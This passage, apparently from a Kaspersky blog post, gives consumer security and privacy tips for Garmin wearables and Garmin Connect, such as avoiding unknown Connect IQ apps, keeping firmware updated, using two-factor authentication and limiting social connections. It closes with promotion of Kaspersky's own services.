1. Avoid installing third-party watch faces and apps from unknown developers in the Connect IQ Store.
2. Stick to official Garmin watch faces built into your device.
3. Make sure to regularly update your Garmin devices. You can do this through Garmin Express on your desktop, or by using Garmin Connect on your smartphone.
4. Turn off automatic app downloads from the Connect IQ Store in the settings.

General recommendations

In an era of increasing cyberthreats to IoT devices, properly configuring the privacy settings on your wearables is crucial. Your digital security doesn’t just depend on device vendors; it also relies on the steps you take to protect your personal data.

1. Use unique passwords for all accounts, including Garmin Connect. Read more on how to create a strong and easy-to-remember password.
2. Turn on two-factor authentication wherever possible.
3. Double-check the privacy settings after every app update to avoid any unwelcome surprises.
4. Curb your connections on the Garmin Connect social network.
5. Ignore connection requests from strangers.

To manage privacy for popular apps and gadgets, be sure to use our free service, Privacy Checker. And to stay on top of the latest cyberthreats and respond quickly, subscribe to our Telegram channel. Finally, the specialized privacy protection modes in Kaspersky Premium ensure maximum security for your personal information and help prevent data theft across all your devices.

Below are detailed instructions on how to configure security and privacy for the most popular running trackers.

• How to set up security and privacy in Strava
• How to set up security and privacy in Nike Run Club
• How to set up security and privacy in adidas Running (Runtastic)
• How to set up security and privacy in ASICS Runkeeper
• How to set up security and privacy in MapMyRun

Kaspersky official blog – ​Read More